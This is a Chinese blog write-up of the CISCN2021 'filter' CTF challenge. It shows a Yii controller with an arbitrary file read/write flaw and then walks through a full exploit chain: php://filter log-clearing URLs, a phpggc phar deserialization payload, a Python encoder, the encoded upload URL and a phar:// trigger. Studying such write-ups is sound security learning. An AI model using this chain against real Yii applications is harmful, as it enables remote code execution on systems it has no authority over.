CISCN2021 filter
|
0
|
299
|
buu刷题

282 字
|
8 分钟

[CISCN2021 Quals]filter

buu复现

重点代码

 [
                'class' => AccessControl::className(),
                'only' => ['logout'],
                'rules' => [
                    [
                        'actions' => ['logout'],
                        'allow' => true,
                        'roles' => ['@'],
                    ],
                ],
            ],
            'verbs' => [
                'class' => VerbFilter::className(),
                'actions' => [
                    'logout' => ['post'],
                ],
            ],
        ];
    }

    /**
     * [email protected]}
     */
    public function actions()
    {
        return [
            'error' => [
                'class' => 'yii\web\ErrorAction',
            ],
            'captcha' => [
                'class' => 'yii\captcha\CaptchaAction',
                'fixedVerifyCode' => YII_ENV_TEST ? 'testme' : null,
            ],
        ];
    }

    /**
     * Displays homepage.
     *
     * @return string
     */
    public function actionIndex()
    {
        $file = Yii::$app->request->get('file');
        $res = file_get_contents($file);
        file_put_contents($file,$res);
        return $this->render('index');
    }

    /**
     * Login action.
     *
     * @return Response|string
     */
    public function actionLogin()
    {
        if (!Yii::$app->user->isGuest) {
            return $this->goHome();
        }

        $model = new LoginForm();
        if ($model->load(Yii::$app->request->post()) && $model->login()) {
            return $this->goBack();
        }

        $model->password = '';
        return $this->render('login', [
            'model' => $model,
        ]);
    }

    /**
     * Logout action.
     *
     * @return Response
     */
    public function actionLogout()
    {
        Yii::$app->user->logout();

        return $this->goHome();
    }

    /**
     * Displays contact page.
     *
     * @return Response|string
     */
    public function actionContact()
    {
        $model = new ContactForm();
        if ($model->load(Yii::$app->request->post()) && $model->contact(Yii::$app->params['adminEmail'])) {
            Yii::$app->session->setFlash('contactFormSubmitted');

            return $this->refresh();
        }
        return $this->render('contact', [
            'model' => $model,
        ]);
    }

    /**
     * Displays about page.
     *
     * @return string
     */
    public function actionAbout()
    {
        return $this->render('about');
    }
}

解题过程


经典漏洞,参考链接:https://xz.aliyun.com/t/9165?page=1
多次将utf8转utf16编码再用base64编码清空log

http://0ad9850f-5f89-4ff5-8b7f-68918f6d82e6.node3.buuoj.cn/index.php?r=site/index&file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log


发送偶数文件名

http://0ad9850f-5f89-4ff5-8b7f-68918f6d82e6.node3.buuoj.cn/index.php?r=site/index&file=AA

用phpggc生成payload


python脚本生成最终payload

from binascii import b2a_hex
payload = "PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQrEAQAAAgAAABEAAAABAAAAAABtAQAATzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXGRiXENvbm5lY3Rpb24iOjI6e3M6MzoicGRvIjtpOjE7czozOiJkc24iO086MjY6InlpaVxkYlxDb2x1bW5TY2hlbWFCdWlsZGVyIjoyOntzOjc6IgAqAHR5cGUiO3M6MToieCI7czoxMToiY2F0ZWdvcnlNYXAiO086MjI6InlpaVxjYWNoaW5nXEFycmF5Q2FjaGUiOjI6e3M6MTA6InNlcmlhbGl6ZXIiO2E6MTp7aToxO3M6NzoicGhwaW5mbyI7fXM6MzA6IgB5aWlcY2FjaGluZ1xBcnJheUNhY2hlAF9jYWNoZSI7YToxOntzOjE6IngiO2E6Mjp7aTowO3M6MToibCI7aToxO2k6MDt9fX19fX0FAAAAZHVtbXkEAAAAHoa7YAQAAAAMfn/YpAEAAAAAAAAIAAAAdGVzdC50eHQEAAAAHoa7YAQAAAAMfn/YpAEAAAAAAAB0ZXN0dGVzdA3ys4F17oy2dAU2HTI5W1w1NO87AgAAAEdCTUI="
armedPayload = ''
for i in payload:
    i = "="+b2a_hex(i.encode('utf-8')).decode('utf-8').upper()
    armedPayload += i+"=00"
print("123456789012345"+armedPayload)

将payload上传

http://0ad9850f-5f89-4ff5-8b7f-68918f6d82e6.node3.buuoj.cn/index.php?r=site/index&file=123456789012345=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=45=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=74=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=79=00=4D=00=7A=00=6F=00=69=00=65=00=57=00=6C=00=70=00=58=00=47=00=52=00=69=00=58=00=45=00=4A=00=68=00=64=00=47=00=4E=00=6F=00=55=00=58=00=56=00=6C=00=63=00=6E=00=6C=00=53=00=5A=00=58=00=4E=00=31=00=62=00=48=00=51=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=7A=00=59=00=36=00=49=00=67=00=42=00=35=00=61=00=57=00=6C=00=63=00=5A=00=47=00=4A=00=63=00=51=00=6D=00=46=00=30=00=59=00=32=00=68=00=52=00=64=00=57=00=56=00=79=00=65=00=56=00=4A=00=6C=00=63=00=33=00=56=00=73=00=64=00=41=00=42=00=66=00=5A=00=47=00=46=00=30=00=59=00=56=00=4A=00=6C=00=59=00=57=00=52=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=78=00=4E=00=7A=00=6F=00=69=00=65=00=57=00=6C=00=70=00=58=00=47=00=52=00=69=00=58=00=45=00=4E=00=76=00=62=00=6D=00=35=00=6C=00=59=00=33=00=52=00=70=00=62=00=32=00=34=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4D=00=7A=00=6F=00=69=00=63=00=47=00=52=00=76=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=7A=00=4F=00=69=00=4A=00=6B=00=63=00=32=00=34=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=59=00=36=00=49=00=6E=00=6C=00=70=00=61=00=56=00=78=00=6B=00=59=00=6C=00=78=00=44=00=62=00=32=00=78=00=31=00=62=00=57=00=35=00=54=00=59=00=32=00=68=00=6C=00=62=00=57=00=46=00=43=00=64=00=57=00=6C=00=73=00=5A=00=47=00=56=00=79=00=49=00=6A=00=6F=00=79=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=52=00=35=00=63=00=47=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=6F=00=69=00=65=00=43=00=49=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=54=00=6F=00=69=00=59=00=32=00=46=00=30=00=5A=00=57=00=64=00=76=00=63=00=6E=00=6C=00=4E=00=59=00=58=00=41=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=49=00=36=00=49=00=6E=00=6C=00=70=00=61=00=56=00=78=00=6A=00=59=00=57=00=4E=00=6F=00=61=00=57=00=35=00=6E=00=58=00=45=00=46=00=79=00=63=00=6D=00=46=00=35=00=51=00=32=00=46=00=6A=00=61=00=47=00=55=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6E=00=4E=00=6C=00=63=00=6D=00=6C=00=68=00=62=00=47=00=6C=00=36=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=4D=00=36=00=4D=00=7A=00=41=00=36=00=49=00=67=00=42=00=35=00=61=00=57=00=6C=00=63=00=59=00=32=00=46=00=6A=00=61=00=47=00=6C=00=75=00=5A=00=31=00=78=00=42=00=63=00=6E=00=4A=00=68=00=65=00=55=00=4E=00=68=00=59=00=32=00=68=00=6C=00=41=00=46=00=39=00=6A=00=59=00=57=00=4E=00=6F=00=5A=00=53=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6E=00=67=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=6F=00=69=00=4D=00=53=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=32=00=6B=00=36=00=4D=00=44=00=74=00=39=00=66=00=58=00=31=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=74=00=59=00=61=00=6D=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=74=00=59=00=61=00=6D=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=4C=00=52=00=55=00=35=00=6E=00=6D=00=63=00=4E=00=77=00=34=00=66=00=63=00=6D=00=52=00=77=00=38=00=6B=00=42=00=70=00=51=00=63=00=4E=00=31=00=57=00=61=00=71=00=34=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00=0A=00

解码出phar文件

http://0ad9850f-5f89-4ff5-8b7f-68918f6d82e6.node3.buuoj.cn/index.php?r=site/index&file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

触发phar

http://0ad9850f-5f89-4ff5-8b7f-68918f6d82e6.node3.buuoj.cn/index.php?r=site/index&file=phar://../runtime/logs/app.log/1.txt

然后。。。。。。。buu复现失败。。。
经常按着payload打,然后就不出flag,还是太菜了
参考链接:https://ma4ter.cn/2573.html

框架漏洞
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																					

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






下一篇